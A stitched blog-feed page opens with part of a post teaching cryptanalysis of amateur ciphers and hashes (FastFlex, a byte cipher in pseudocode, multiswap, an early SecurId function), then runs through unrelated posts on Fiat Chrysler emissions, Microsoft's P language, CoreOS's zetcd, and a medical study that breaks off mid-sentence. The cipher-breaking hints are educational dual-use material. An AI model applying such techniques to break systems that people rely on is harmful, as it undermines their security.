It seems to only be a compression function (processBlock( )) that takes a 25 word input and produces a 5 word output. For the r’th round, he is mixing in inputs from in[5*r], … , in[5*r+4] into hash[0], …, hash[4]; seemingly unaware that we could compute the state of hash at any point and choose our next inputs accordingly (similar to the way we broke chaotic hash). This one falls trivially, but for fun, I made my collisions to be preimages of the all zero output.

When FastFlex was proposed in 2006, the author made bold claims on the sci.crypt newsgroup about it not being resistant to linear or differential cryptanalysis, and wondered if there might be any other issues that he needs to worry about. When somebody talks about these cryptanalysis techniques, you assume they know a little bit about cryptography, but it just goes to show: learning the techniques without knowing how to think like a cryptographer is of little value. I took a look at the code the author had, and it had basic problems such as not initialising variables. Within about a half hour, I found collisions (it may seem like I am always sending in zero words for the functions I break, but I didn’t need to for this one) in the hash function using techniques similar to how I broke the chaotic hash function above, and such collisions could easily be produced regardless of how variables were initialised. The amusing reply from the author acknowledged the problem but somehow concluded that FastFlex is still safe!

After my reply, the author modified his design and sent it for publication, carefully making sure that the sci.crypt people didn’t see his updated design in the time frame of the publication attempt. The author claims that the paper was published (see bottom of page), but the updated paper made no acknowledgement of the insecurity of the previous version or my finding. The evidence for the security in the updated paper is pretty bad.

Unfortunately, the original specification seems to be no longer around, so breaking the new version remains open. But let’s just say that how I broke it had a lot of similarities to how I broke the chaotic hash function, so first prepare yourself accordingly, and then take out the new FastFlex! FastFlex is designed to build a number of cryptographic constructs from it. I recommend starting with the hash functions, and after you break those, go after the random number generator. If you are like me, you’ll start by going directly after the implementation rather than trying to waste too much time trying to read the author’s research paper.

If FastFlex was indeed published, then you should be able to get a publication out of breaking it provided that you write it up well. I’d be most delighted to hear successful attacks on this one. Note to attackers: make sure you save a copy of his code and pdf description after you break it so that the author cannot hide the history.

Amateurs are never shy to come up with their own cryptographic solutions, and often are generous enough to give them to the world unencumbered by patents. While their hearts are in the right place, it is just not that easy to build a secure cryptosystem. At the bottom of this linked page, you can read about the R.A.T. encoding and decoding system.

I’m pretty sure there are numerous ways to attack this one (especially if you want to use linear algebra, but I didn’t), but my solution is in this link. Don’t look at it until you found your own solution!

But here’s two hints to start you out:

Always give yourself the advantage by starting out with a chosen plaintext attack (or chosen ciphertext attack), and then it can likely be converted into other types of attacks later.
It makes things easier if you write it out in terms of arrays (for A and B) so you can keep track of the relation between things from iteration to iteration.

To elaborate on point 2, the cipher would look something like this (where A, B, and X are byte arrays of the length of the input size, and key is a byte array of length 256 — how it was generated does not really matter in my attack):

    initialise:  A[0] = 0, B[0] = 128

    for i = 1 to the number of plaintext bytes {
        Let X[i] = i'th plaintext byte
        A1 = X[i] ^ key[ B[i-1] ]
        B[i] = A1 ^ key[ A[i-1] ]
        output B[i] as the i'th byte of the ciphertext
        A[i] = A1
    }

My break revealed bytes of the key when a certain condition happens, but I bet you can generalise it to do better.

In 2001, “Beale Screamer” reverse engineered and broke Microsoft’s Digital Rights Scheme — see link. The scheme involved a cipher that he named “multiswap” (described in the link), because it used multiplication and swapped halves of computer words around. Beale Screamer’s break of the DRM scheme did not touch the cryptography, which made it a prime target for cryptographers.

I immediately had a look at the cipher, and it didn’t take me long before I found a way to recover two words of the key (k[5] and k[11]) simply by choosing my plaintexts in such a way that made the multiplies disappear (hint hint). I went to sleep thinking I will return to it the next day for attacking more of the cipher. Unfortunately, my plans were preempted by a fast team of Berkley cryptographers who had the entire cipher broke by the next day — their solution is here.

Unsurprisingly, I started my attack the exact same way as the the Berkeley team to recover two words of the key. You should be able to do the same thing. After that, they used differential cryptanalysis to get the rest. Since I assume that the reader is new to cryptography, I am not going to expect that he/she derives the remaining parts of the key similar to the Berkeley team. However, there are various approaches one can play with in order to refine their cryptographic skills. For example, knowing the plaintext allows you to compute s0′ and s1′ (from Berkeley description, which I believe is easier to work from). Then, one can try to deduce k[0], …, k[4] independently of k[6], … , k[10]. We could almost attempt the same technique that we used to break the lcg_value( ) here, except that’s still too many key bits to guess in a practical implementation. However, if you reduce the size of the cipher in half (half of the number of key words, half of the number of rounds), then such a technique should work. Give it a try!

Finally, one of the cutest parts of the Berkeley attack was showing how to convert the chosen plaintext attack into a known plaintext attack. As we said before, give yourself the best advantage to start out with, and then worry about converting it to other forms of attacks later!

Over many years on sci.crypt, I saw a number of ciphers broken by members of the group. I also occasionally see new ones that I think must be trivially breakable. Nowadays, reddit seems to be the place to go. It is impossible for me to dig up all of the easily broken designs, but here are a few that I remember:

The hash function Shahaha was proposed here, and broken by Scott Fluhrer here. Can you come up with your own break? (Scott Fluhrer broke a number of amateur designs in the sci.crypt days, but this is the only one I found so far).
Just as I was trying to dig up old sci.crypt examples of ciphers, somebody on reddit’s crypto group posted an I designed my own crypto thread. This is a block cipher called XCRUSH. The full design is here. The author claims that it is purely an academic exercise and makes no security claims at all in the paper, so his motivation is entirely for learning. It’s also written up nicely, which is an advantage if you want people to look at your design. Upon posting it on reddit, a character by the identity of bitwiseshiftleft found theoretical weaknesses quite soon (like in many of the examples above, the magic zero comes into play here again). See the comments in the reddit thread for more detail. There was also some interesting analysis based upon SAT solvers, but this is outside my expertise so I leave the reference for interested parties.
This one might require a little bit of math, who knows how much (can’t be sure — I have not tried attacking it yet). Here is a public key cryptosystem that seems too good to be true. However, the author made a pretty basic mistake in his analysis (first observed by rosulek): the author claims to have proven that you can break it by solving circuit satisfiability (SAT). Ummm, you can break every cryptosystem if you can solve SAT efficiently! What would have been more interesting was showing the contrapositive: (i.e. if you could break his cryptosystem, then you can solve SAT). The simple fact that the author did not know which direction to do the security reduction is indicative of his lack of experience, and hints that it can easily be broken.
I was debating whether or not to include the first attacks on the original SecurId in the main list above, but ultimately I decided that it is too much detail. However if anybody wants to have a go, here is the code reverse-engineered from “I.C. Wiener”, here is the description of the function from Belgian cryptographers (My coauthor and I worked from the original version that they posted on eprint, which has since been updated), and here is the first attack I found. Read through section 1 of my attack, and then try to attack it with the following information in mind: the vanishing differentials (collisions) happen in the first 32-subrounds, so key search can be expedited by computing only part of the function rather than the full thing (so what fraction of the function do you need to compute in order to test for a collision?) But there is even more you can do here: only the first 32-bits of the key are involved in the first 32-subrounds, and many of these permutations on the data overlap, leading to more speedups. Two important notes: (1) although the term “vanishing differential” suggests differential cryptanalysis (not suitable for a beginner), the term really just means hash collision here, and (2) RSA has since discontinued that function and is now using something more standard in their design.

If you know of any other good ones (including a sample break), then please provide the link and I will try to regularly update the list.

Fiat Chrysler to Modify 100,000 Vehicles After Accusations of Emissions Cheating

May 19, 2017, 4:48 pm

≫ Next: P: A programming language for asynchrony, fault-tolerance and uncertainty

≪ Previous: Learning to break ciphers

The carmaker said the move was the “result of many months of close collaboration” with the Environmental Protection Agency and the California Air Resources Board. Fiat Chrysler said it thought the updates would help it reach settlements with the E.P.A. and the Justice Department.

The Justice Department has been investigating Fiat Chrysler since the E.P.A. in January accused the carmaker of violating clean-air rules. Fiat Chrysler said this week that it was trying to work out a settlement with the Justice Department, but added that it would fight any suggestion that it had used illegal software to dupe regulators.

In 2015 and 2016, the company sold more than 50,000 diesel Ram pickups in the United States each year, making the model the country’s largest-selling diesel-powered light vehicle by far, according to HybridCars.com. But the emissions question has kept Fiat Chrysler from selling any diesel Ram or Grand Cherokee vehicles this year because the E.P.A. has not certified them for sale.

The E.P.A. declined to comment about Fiat Chrysler’s announcement.

The company already faces accusations in Europe that its cars produce far more nitrogen oxides in normal driving than during tests. On Wednesday, the European Union’s executive arm filed a formal complaint against the Italian government for allowing Fiat Chrysler to sell cars designed to evade emissions tests.

And the evidence has piled up that those high emissions levels were part of efforts to evade environmental standards.

Academic researchers on both sides of the Atlantic said separately this week that they had found that Fiat Chrysler’s diesel vehicles had suspiciously high pollution levels and that there was evidence the company had used a so-called defeat device, software intended to allow a vehicle to pass official emissions tests but to pollute more when driven on the highway.

In the latest instance, the American university researcher who exposed Volkswagen’s emissions scandal said in a telephone interview late Thursday that tests of Jeep Grand Cherokees and Ram 1500 had revealed major discrepancies between road and lab emissions.

Dan Carder, director of a renowned vehicle emissions program at West Virginia University, said a diesel Ram pickup tested by the group produced up to 20 times as much harmful nitrogen oxides on the road than under controlled conditions in a lab. A diesel Jeep Grand Cherokee produced up to five times as much.

A 2013 study by Mr. Carder’s team set off a chain of events that exposed Volkswagen’s use of illegal software to conceal excess emissions in diesel cars. That led to Mr. Carder being named one of Time magazine’s 100 most influential people last year. Eventually the German automaker paid more than $22 billion in legal settlements and fines stemming from the cheating.

Mr. Carder said he did not try to determine whether the Fiat Chrysler vehicles were equipped with so-called defeat devices, but said that such big discrepancies between lab and road tests were unusual.

“It suggests different emission control versus what’s in the laboratory,” he said.

While it is normal for diesel vehicles to pollute somewhat more in normal driving than in the controlled environment of a lab, Mr. Carder said, “when you get to five times that’s kind of eye raising.”

While he stopped short of accusing Fiat Chrysler of using illegal software, a separate study found evidence that the company had done so.

Researchers from the University of the Ruhr in Bochum, Germany, and at the University of California, San Diego, said this week that they had found evidence of a defeat device in a diesel Fiat 500X, a compact S.U.V. sold in Europe.

Fiat Chrysler declined to comment on accusations of cheating in the 500X. The company told the European Parliament last year that the car was not programmed to detect emissions tests or to deactivate the pollution control equipment after a certain period of time.

Mr. Carder’s team in West Virginia tested four models: 2014 and 2015 Jeep Grand Cherokees and 2014 and 2015 Ram 1500 pickups. All the models had diesel engines, which are more fuel efficient than gasoline motors but produce more nitrogen oxides, a family of gases linked to lung ailments, premature deaths and smog.

The group drove the vehicles on roads around Morgantown, W.Va., the home of West Virginia University, using equipment that measures emissions while the vehicle is on the road. Those results were compared with tests at the university’s labs, where cars run on rollers while emissions are checked. The testing included more than 100 road trips and several hundred lab tests, Mr. Carder said.

All four of the models have 3-liter diesel engines with a pollution control system that uses a spray of a chemical solution to neutralize nitrogen oxides in the exhaust.

That kind of emissions control system can be effective, but only if the car is programmed to spray adequate amounts of the solution. Volkswagen was found to have rationed doses of the solution because the company did not want to inconvenience customers with frequent refills.

Mr. Carder said he did not know why the Grand Cherokee appeared to pollute less than the Ram pickup, but he said it would be normal for different vehicles to have different software configurations.

A resumption of sales of the diesel Ram and Grand Cherokees in the United States is unlikely for several weeks or even months. Fiat Chrysler’s proposal must first be accepted by the Justice Department, and then its fix must be certified as compliant with E.P.A. emissions regulations.

Once the software is certified, Fiat Chrysler could alert owners with a recall — or possibly a less formal customer service campaign — to take their vehicles to a dealer to have the software updated at no charge.

↧

P: A programming language for asynchrony, fault-tolerance and uncertainty

May 19, 2017, 10:54 am

≫ Next: Introducing zetcd

≪ Previous: Fiat Chrysler to Modify 100,000 Vehicles After Accusations of Emissions Cheating

By Shaz Qadeer, Principal Researcher

P programming language designed for asynchrony, fault-tolerance and uncertainty

The complexity of emerging software applications requires new approaches to understanding and then efficiently building, testing and debugging these systems. Today’s software uses cloud resources, is often embedded in devices in the physical world and employs artificial intelligence techniques. These three factors make today’s software systems an order of magnitude more difficult to develop.

Often, these modern applications feature asynchrony, which happens when, to improve performance, the requestor of an operation continues without requiring the completion of the operation. Asynchrony inevitably leads to concurrency, with its notorious pitfalls of race conditions and Heisenbugs (software bugs, often timing-related, that seems to disappear when investigated, due to changes resulting from the investigation). To address the challenges of asynchronous computation, we have developed P, a programming language for modeling and specifying protocols in asynchronous event-driven applications. This project is a collaborative effort between Microsoft researchers and engineers, and academic researchers at the University of California, Berkeley and Imperial College in London.

A flowchart of the P programming language tool chain

A flowchart of the P tool chain

The P programmer writes the protocol and its specification at a high level. The P compiler provides automated testing for concurrency-related race conditions and executable code for running the protocol. P provides first-class support for modeling concurrency, specifying safety and liveness properties and checking that the program satisfies its specification using systematic search. In these capabilities, it is similar to Leslie Lamport’s TLA+ and Gerard Holzmann’s SPIN. Unlike TLA+ and SPIN, a P program can also be compiled into executable C code. This capability bridges the gap between high-level model and low-level implementation and eliminates a huge hurdle to the acceptance of formal modeling and specification among programmers.

Communicating state machines

The programming model in P is based on concurrently executing state machines communicating via events, with each event accompanied by a typed payload value. A memory management system based on linear typing and unique pointers provides safe memory management and data-race-free concurrent execution. In this respect, P is similar to modern systems programming languages such as Rust.

P got its start in Microsoft software development when it was used to ship the USB 3.0 drivers in Windows 8.1 and Windows Phone. These drivers handle one of the most important peripherals in the Windows ecosystem and run on hundreds of millions of devices today. P enabled the detection and debugging of hundreds of race conditions and Heisenbugs early on in the design of the drivers, and is now extensively used for driver development in Windows. Early positive experience with P in the Windows kernel led to the development of P#, a framework that provides state machines and systematic testing via an extension to C#. In contrast to P, the approach in P# is minimal syntactic extension and maximal use of libraries to deliver modeling, specification and testing capabilities.

P is transforming the development of cloud infrastructure in Azure. Azure, similar to other cloud providers, faces the challenge of Heisenbugs caused by unexpected race conditions and software or hardware faults. These bugs result in disruption of live services — a huge problem for both customers and providers of cloud services. P and P# are being used to find and debug Heisenbugs in already-deployed services and to design and validate new services before deployment. P allows engineers to precisely model asynchronous interfaces among components in a large Azure service. It also allows engineers to discover and debug problems on their desktops that would otherwise take months and sometimes even years to manifest after the service is deployed.

An important feature of P that makes it particularly suitable for validating fault-tolerant distributed services is the ability to perform thorough failover testing, that is, validating that the service recovers and resumes operation when an unexpected fault happens. Both network message drops and individual state machine failures are modeled as events. Modeling a fault as an event in P fully automates fault-injection and enables systematic testing of failover under a huge number of event orderings and faults, with little effort from the programmer.

The systematic testing capabilities in P thoroughly search over the choices induced by nondeterministic ordering of concurrently dispatched events. However, its capabilities are limited with respect to handling explicit data input, especially when that input is over large domains. This limitation makes it difficult to apply P to applications such as robotics where a significant source of complexity is decision-making under uncertain input. Dealing with large and uncertain input domains is an ongoing research investigation. We are investigating both symbolic and probabilistic techniques to deal with this challenge.

Download P

↧

Introducing zetcd

May 19, 2017, 12:23 pm

≫ Next: Hospital patients treated by older physicians are more likely to die

≪ Previous: P: A programming language for asynchrony, fault-tolerance and uncertainty

Distributed systems commonly rely on a distributed consensus to coordinate work. Usually the systems providing distributed consensus guarantee information is delivered in order and never suffer split-brain conflicts. The usefulness, but rich design space, of such systems is evident by the proliferation of implementations; projects such as chubby, ZooKeeper, etcd, and consul, despite differing in philosophy and protocol, all focus on serving similar basic key-value primitives for distributed consensus. As part of making etcd the most appealing foundation for distributed systems, the etcd team developed a new proxy, zetcd, to serve ZooKeeper requests with an unmodified etcd cluster.

ZooKeeper is the first popular open source software in this vein, making it the preferred backend for many distributed systems. These systems would conceptually work with etcd as well, but they don’t in practice for historical reasons. An etcd cluster can’t drop-in for ZooKeeper; etcd’s data model and client protocol is incompatible with ZooKeeper applications. Neither can ZooKeeper applications be expected to natively support etcd; if the system already works, there’s little motivation to further complicate it with new backends. Fortunately, the etcd v3 API is expressive enough to emulate ZooKeeper’s data model client-side with an ordinary proxy: zetcd, a new open source project developed by the etcd team. Today marks zetcd’s first beta release, v0.0.1, setting the stage for managing and deploying zetcd in production systems.

The zetcd proxy sits in front of an etcd cluster and serves an emulated ZooKeeper client port, letting unmodified ZooKeeper applications run on top of etcd. At a high level, zetcd ingests ZooKeeper client requests, fits them to etcd’s data model and API, issues the requests to etcd, then returns translated responses back to the client. The proxy’s performance is competitive with ZooKeeper proper and simplifies ZooKeeper cluster management with etcd features and tooling. This post will show how to use zetcd, how zetcd works, and share some performance benchmarks.

Getting started with zetcd

All zetcd needs to get running is a go compiler, an internet connection to fetch the source code, and a system that can run etcd. The following example will build zetcd from source and run a few ZooKeeper commands against it. This is not suggested for serious deployments due to building etcd and zetcd from development branches, but it’s the simplest way to give it a try.

First, get the source and build the binaries for etcd and zetcd:

go get github.com/coreos/etcd/cmd/etcd
go get github.com/coreos/zetcd/cmd/zetcd

Next, run etcd and connect zetcd to the etcd client endpoint:

# etcd uses localhost:2379 by default
etcd &
zetcd -zkaddr localhost:2181 -endpoints localhost:2379 &

Try zetcd by watching and creating a key:

go install github.com/coreos/zetcd/cmd/zkctl
zkctl watch / &
zkctl create /abc "foo"

Conceptually, the example is organized as a zetcd layer on top of a single etcd instance:

zetcd topology — A simple zetcd server topology

So what is the zetcd layer doing?

ZooKeeper into etcd3

Under the hood, zetcd translates ZooKeeper’s data model to fit etcd APIs. For key lookup, zetcd converts ZooKeeper’s hierarchical directories to etcd’s flat binary keyspace. For managing metadata, zetcd leverages transactional memory to safely and atomically update ZooKeeper znode information when writing to the etcd backend.

ZooKeeper lists keys by directory (getChildren), whereas etcd lists keys by interval (Range). The figure below illustrates how zetcd encodes keys in etcd to support efficient directory listing. All zetcd keys in etcd have a prefix including directory depth (e.g., “/” and “/abc/” have depths of 0 and 1 respectively). To list a directory, zetcd issues a prefix range request (e.g., the range [“/zk/key/002/abc/”, “/zk/key/002/abc0”) for listing /abc/) matching all keys with the directory’s depth and path. The depth limits keys to the directory itself; if zetcd used the path as a prefix without the depth, then all keys under the directory, instead of only its immediate children, would be returned by etcd and dropped by the proxy.

zookeeper key hierarchy organization in etcd — Organization of a ZooKeeper key hierarchy in etcd

Each ZooKeeper key carries metadata in its ZNode about the key’s revision, version, and permissions. Although etcd also has per-key metadata, that metadata is simpler than a ZNode: there’s no children versioning since there are no directories, no ACLs since etcd uses role based authentication, and no timestamps since real clocks are out of scope. This extra metadata maps to a bundle of keys (see figure above) that describes a full ZNode. To adjust the metadata, zetcd updates subsets of the keys atomically with software transactional memory, keeping the ZNodes consistent without expensive locking.

Additionally, zetcd can dynamically validate its behavior against an authentic ZooKeeper server. To compare, zetcd connects to both etcd and an external ZooKeeper server. When a client issues a request to zetcd in this mode, the request is dispatched to both zetcd and ZooKeeper servers. If the two server responses semantically disagree, zetcd flags the responses with a cross-checking warning.

Microbenchmarks

With all the data translation and the additional network hop, it may be easy to dismiss the emulation as impractical. Although there is some additional cost over a pure ZooKeeper or etcd cluster, zetcd holds an advantage when an etcd installation is available but there’s some application that expects a ZooKeeper for coordination. For example, early user reports claim encrypting traffic in zetcd through etcd’s TLS is simpler than encrypting a similar classic ZooKeeper configuration. In these cases, performance is less important than simply having a reliable cluster that speaks the ZooKeeper protocol.

Benchmarking with zetcd’s command line zkboom utility can help judge whether a zetcd installation’s performance is adequate. The interface and reports are similar to etcd’s benchmark tool. Other ZooKeeper benchmarking tools should work with zetcd as well; zkboom is provided for convenience. To try it out, run zkboom to test key creation:

go get github.com/coreos/zetcd/cmd/zkboom
zkboom --conns=50 --total=10000 --endpoints=localhost:2181 create

zetcd should provide adequate performance for small workloads. Latency microbenchmarks over a simple two-node configuration indicate zetcd’s emulation is acceptable for modest request rates. The setup included two modern Linux machines connected through a gigabit switch, with one machine running the proxy and server software over a spinning disk RAID and the other machine generating client requests. Latencies were measured with zkboom by creating and reading 128 byte key-value pairs from an initially empty key store, rate limiting to 2500 requests per second, and increasing total concurrent clients. ZooKeeper 3.4.10 and etcd development branch results are included as a basis for comparison.

The graph below shows zetcd’s average key creation latency over client concurrency. Since etcd has a latency advantage over ZooKeeper between 5ms and 35ms for this benchmark, zetcd has some headroom to accommodate the proxy hop and processing. The zetcd proxy still underperforms ZooKeeper by a margin of about 20ms, but judging from throughput data, it is not queuing since it sustains the 2500 request rate. One explanation zetcd’s slower writes is that it must both read keys from etcd and write several keys into etcd for each new ZooKeeper key due to data model differences.

The graph below shows zetcd’s average key fetch latency over client concurrency. ZooKeeper’s fetch latency is slightly faster than etcd, by about 2ms, so zetcd would need further etcd improvements before possibly serving data faster than ZooKeeper. However, the zetcd latency hit only adds about 1.5ms latency over etcd key fetches, despite requesting extra keys from etcd to emulate ZooKeeper znode metadata. The zetcd key fetch operation only costs a single round-trip since the read requests are bundled into one etcd transaction.

Toward v0.0.1 and beyond

So far zetcd has promising results. The performance is reasonable, easily sustaining more than a thousand operations per second with acceptable latency. Its emulation is close enough to ZooKeeper be a drop-in replacement for Mesos, Kafka, and Drill. There’s still room to tune zetcd for performance gains. Likewise, testing more ZooKeeper applications will further pose zetcd as a replacement for ZooKeeper servers.

zetcd’s been available to the open source community since October and has just pushed its first tagged release, zetcd v0.0.1. By marking its first beta release, zetcd is ready for stable management and deployment in future production systems. When paired with the etcd operator, these systems running zetcd will effectively have a self-driving “ZooKeeper” cluster with automated backend upgrades, backups, and TLS management. To learn more, ask questions, or request improvements visit the zetcd GitHub at https://github.com/coreos/zetcd/.

Join us in person at CoreOS Fest, the Kubernetes and distributed systems conference, on May 31 and June 1 in San Francisco. Register here to attend two days of talks from the community on the latest developments in the open source container ecosystem.

↧

Hospital patients treated by older physicians are more likely to die

May 19, 2017, 6:51 pm

≫ Next: Adding a new Bytecode instruction to the .NET runtime

≪ Previous: Introducing zetcd

Abstract

Objectives To investigate whether outcomes of patients who were admitted to hospital differ between those treated by younger and older physicians.

Design Observational study.

Setting US acute care hospitals.

Participants 20% random sample of Medicare fee-for-service beneficiaries aged ≥65 admitted to hospital with a medical condition in 2011-14 and treated by hospitalist physicians to whom they were assigned based on scheduled work shifts. To assess the generalizability of findings, analyses also included patients treated by general internists including both hospitalists and non-hospitalists.

Main outcome measures 30 day mortality and readmissions and costs of care.

Results 736 537 admissions managed by 18 854 hospitalist physicians (median age 41) were included. Patients’ characteristics were similar across physician ages. After adjustment for characteristics of patients and physicians and hospital fixed effects (effectively comparing physicians within the same hospital), patients’ adjusted 30 day mortality rates were 10.8% for physicians aged <40 (95% confidence interval 10.7% to 10.9%), 11.1% for physicians aged 40-49 (11.0% to 11.3%), 11.3% for physicians aged 50-59 (11.1% to 11.5%), and 12.1% for physicians aged ≥60 (11.6% to 12.5%). Among physicians with a high volume of patients, however, there was no association between physician age and patient mortality. Readmissions did not vary with physician age, while costs of care were slightly higher among older physicians. Similar patterns were observed among general internists and in several sensitivity analyses.

Conclusions Within the same hospital, patients treated by older physicians had higher mortality than patients cared for by younger physicians, except those physicians treating high volumes of patients.

Introduction

The relation between physician age and performance remains largely unknown, particularly with respect to patient outcomes. Clinical skills and knowledge accumulated by more experienced physicians can lead to improved quality of care. Physicians’ skills, however, can also become outdated as scientific knowledge, technology, and clinical guidelines change. Incorporating these changes into clinical practice is time consuming and can at times be overwhelming.1 2 3 Interest in how quality of care evolves over a physician’s career has revived in recent years, with debates over how best to structure programs for continuing medical education, including recent controversy in the US regarding maintenance of certification programs.

A systematic review of the relation between physician experience and quality of care found that older physicians might perform worse—older physicians have decreased clinical knowledge, adhere less often to standards of appropriate treatment, and perform worse on process measures of quality with respect to diagnosis, screening, and preventive care.4 Data on patient outcomes, which arguably are most important, have been scarce.4 Existing studies have also been limited in size or disease scope and have not been nationally representative.5 6 7 As a result, whether physician age is associated with patient outcomes remains largely unknown.

Using nationally representative data on Medicare beneficiaries admitted to hospital with a medical condition during 2011-14, we sought answers to three questions. First, what is the association between age of the treating physician and patient mortality after admission? Second, does this association vary with the volume of patients a physician treats? Finally, given national efforts to improve the efficiency of healthcare, is physician age associated with readmissions and costs of care?

Methods

Data

We linked multiple data sources: the 20% Medicare Inpatient Carrier and Medicare Beneficiary Summary Files (2011-14); physician data collected by Doximity (an online professional network for physicians); and the American Hospital Association (AHA) annual survey of hospital characteristics (2012). Doximity has assembled data on all US physicians (both those who are registered members of the service as well as those who are not) from multiple sources and data partnerships, including the national plan and provider enumeration system national provider identifier registry, state medical boards, specialty societies such as the American Board of Medical Specialties, and collaborating hospitals and medical schools. The database includes information on physician age, sex, year of completion and name of medical school, residency, and board certification.8 9 10 11 12 Previous studies have validated data for a random sample of physicians in the Doximity database by using manual audits.8 9 We were able to match about 95% of physicians in the Medicare database to the Doximity database.

Patients

We identified beneficiaries of Medicare fee-for-service aged ≥65 who were admitted to hospital with a medical condition (as defined by the presence of a medical diagnosis related group on admission) from 1 January 2011 to 31 December 2014. We restricted our sample to patients treated in acute care hospitals and excluded elective admissions and those in which a patient left against medical advice. To allow sufficient follow-up, we excluded patients admitted in December 2014 from 30 day mortality analyses and patients discharged in December 2014 from readmission analyses.

Medicare hospital spending and method of assigning physicians to patients

In the US, Medicare spending on patients in hospital mainly consists of two components: parts A and B. Part A spending is a fixed payment to a hospital per patient that is determined by the final diagnosis or diagnoses of the patient (categorized into diagnosis related groups) and broadly reflects hospital costs other than professional services. Within each hospital the part A payment does not vary for patients within the same diagnosis related group (with a few exceptions). Part B uses fee-for-service payment, and spending varies with the intensity of services delivered, including visits, procedures, and interpretation of tests and images. Based on previous studies,10 11 12 we defined the responsible physician for a given admission as the physician who billed the largest share of part B costs during that admission.13 In a sensitivity analysis, we used alternative assignment methods to assess the robustness of our findings to this attribution rule.

We restricted our analyses to admissions for which the highest spending physicians were hospitalists (described below) or general internists. For patients transferred to other acute care hospitals (1.2% of admissions), we attributed the multi-hospital episode of care and associated outcomes to the assigned physician of the initial admissions.14 15 On average, 51%, 22%, and 11% of total part B spending was accounted for by the first, second, and third highest spending physicians, respectively.

Our primary analysis focused on patients treated by hospitalists to examine the possibility that older physicians might treat patients with greater or lesser unmeasured severity of illness. Hospitalists are physicians whose clinical focus is caring for patients admitted to hospital.16 17 They are typically trained in internal or family medicine. Some complete subspecialty training as well (such as infectious disease or nephrology) but decide to practice general inpatient medicine. The hospitalist specialty began in the 1990s in the US and is the most rapidly growing medical specialty there. Before the introduction of hospitalists, a patient admitted for a general medical condition was cared for by that patient’s primary care physician (equivalent to general practitioner in the UK), who, on any given day, would typically visit his/her inpatients when time permitted in the outpatient schedule. In 2016, it was estimated that more than 50 000 hospitalists were practicing in the US, and about 75% of US hospitals now have hospitalists.18

Hospitalists typically work in scheduled shifts or blocks (such as one week on and one week off) and do not treat patients in the outpatient setting. Therefore, within the same hospital, patients treated by hospitalists are plausibly quasi-randomized to a particular hospitalist based only on the time of the patient’s admission and the hospitalist’s work schedule.10 11 19 We assessed the validity of this assumption by testing the balance of a broad range of patient characteristics across categories of age of hospitalist. We defined hospitalists as general internists who filed at least 90% of their total evaluation and management billings in an inpatient setting, a claims based approach that a previous study validated by calling physicians to confirm that they were indeed hospitalists (sensitivity of 84.2%, specificity of 96.5%, and a positive predictive value of 88.9%).20

Physician age

Physician age was defined as the age on the date of admission of patients. Data on physician age were available for 93.5% of physicians. Physician age was modeled both as a continuous linear variable and as a categorical variable (in categories of <40, 40-49, 50-59, and ≥60) to allow for a potential non-linear relation with patient outcomes. We also used linear spline models.

Patient outcomes

The primary outcome was the 30 day mortality rate in patients (death within 30 days of admission); secondary outcomes were 30 day readmission rates (readmission within 30 days of discharge) and costs of care. Information on dates of death, including deaths out of hospital, was available in the Medicare Beneficiary summary files. Over 99% of dates of death in these files have been verified by death certificate.21 For mortality analyses, we excluded patients whose death dates were not validated. We defined costs of care as total part B spending per admission.

Adjustment variables

We adjusted for patient characteristics, physician characteristics, and hospital fixed effects. Patient characteristics included age in five year increments, sex, race or ethnic group (non-Hispanic white, non-Hispanic black, Hispanic, other), primary diagnosis (diagnosis related group), 27 comorbidities (Elixhauser comorbidity index22), median household income of zip code (in 10ths), an indicator for dual Medicare-Medicaid coverage, day of the week of the admission date (to account for the possibility that severity of illness of patients could be higher on specific days of the week), and year indicators. Physician characteristics (other than age) included sex, indicator variables for medical school from which a physician graduated (all foreign schools were grouped into a single category), and whether they graduated from allopathic (MD) or osteopathic (DO) medical schools (allopathic and osteopathic schools both teach the same basic curriculums necessary to become a qualified physician, but osteopathic schools emphasize prevention and other techniques as well). We included indicator variables for each hospital, which allowed each hospital to have its own intercept in the regression analyses, a statistical method known as hospital fixed effects. Hospital fixed effects account for both measured and unmeasured characteristics of hospitals that do not vary over time, including unmeasured differences in patient populations, thereby effectively comparing patient outcomes among hospitalists of varying age within the same hospital.23 24 25

Statistical analysis

First, we examined the association between physician age and 30 day mortality using a multivariable logistic regression model treating age as both a continuous variable and a categorical variable to allow for a non-linear relation, adjusting for patient and physician characteristics and hospital fixed effects. We also used linear age splines. To evaluate whether splines improve goodness of fit compared with modeling a linear relation between physician age and patient mortality, we performed a Wald test adjusted for clustering (to approximate a likelihood ratio test because standard likelihood based tests are unavailable with clustered data). To account for potential correlations of patient outcomes within the same physicians, we clustered standard errors at the physician level.26 To overcome complete or quasi-complete separation problems (perfect or nearly perfect prediction of the outcome by the model), we combined diagnosis related group codes with no outcome event (30 day mortality or readmission) into clinically similar categories.27 We calculated adjusted 30 day mortality rates using margins of responses (also known as predictive margins); for each admission we calculated predicted probabilities of outcome with physician age group fixed at each level and then averaged over the distribution of covariates in our national sample.28

Second, because physicians with high volumes of patients might better maintain clinical knowledge and skills,29 30 31 32 we examined whether the association between physician age and patient mortality was modified by volume. We classified physicians into thirds of patient volume: low (estimated number of total admissions <90 per year), medium (91-200 admissions), and high (>201 admissions). Within each group, we examined the association between physician age and patient mortality, adjusting for patient and physician characteristics and hospital fixed effects. We used a Wald test to formally test the interaction between physician age and patient volume.

Finally, we evaluated the association between physician age and 30 day readmissions and costs of care. We used multivariable logistic regression models for readmission analyses. Because cost data were right skewed, we used a generalized linear model (GLM) with a log link and gamma distribution.33

Secondary analyses

We conducted several secondary analyses. First, to test the generalizability of our findings, we repeated our analyses among general internists overall, including both hospitalists and non-hospitalists. Second, to evaluate whether our findings were sensitive to how we attributed patients to physicians, we tested two alternative attribution rules: attributing patients to physicians with the largest number of evaluation and management claims and attributing patients to physicians who billed the first claim for a given admission (“admitting physician”). Third, because the association between physician age and mortality could be confounded by unobserved care preferences of patients, such as do-not-resuscitate directives, we excluded patients with cancer and those discharged to a hospice. Fourth, to assess the relation between physician age and patient outcomes in a relatively young population whose probability of death is lower, we restricted our analysis to patients aged 65-75. Fifth, an increasing number of young subspecialists in specialties like nephrology and infectious disease work as hospitalists but were excluded from our primary analyses. To investigate this, we reanalyzed the data including hospitalists with medical subspecialties and adjusted for their specialty. Sixth, patients who are admitted multiple times might not be randomly assigned to a given hospitalist but instead to the hospitalist who treated the patient previously. To deal with this, we reanalyzed the data after restricting our sample to the first admission. Seventh, we also evaluated in hospital, 60 day, and 90 day mortality rates to assess if any survival gains were short lived. Eighth, we used generalized estimating equations (GEE) with an independent covariance matrix to account for the hierarchical structure of the data because of the 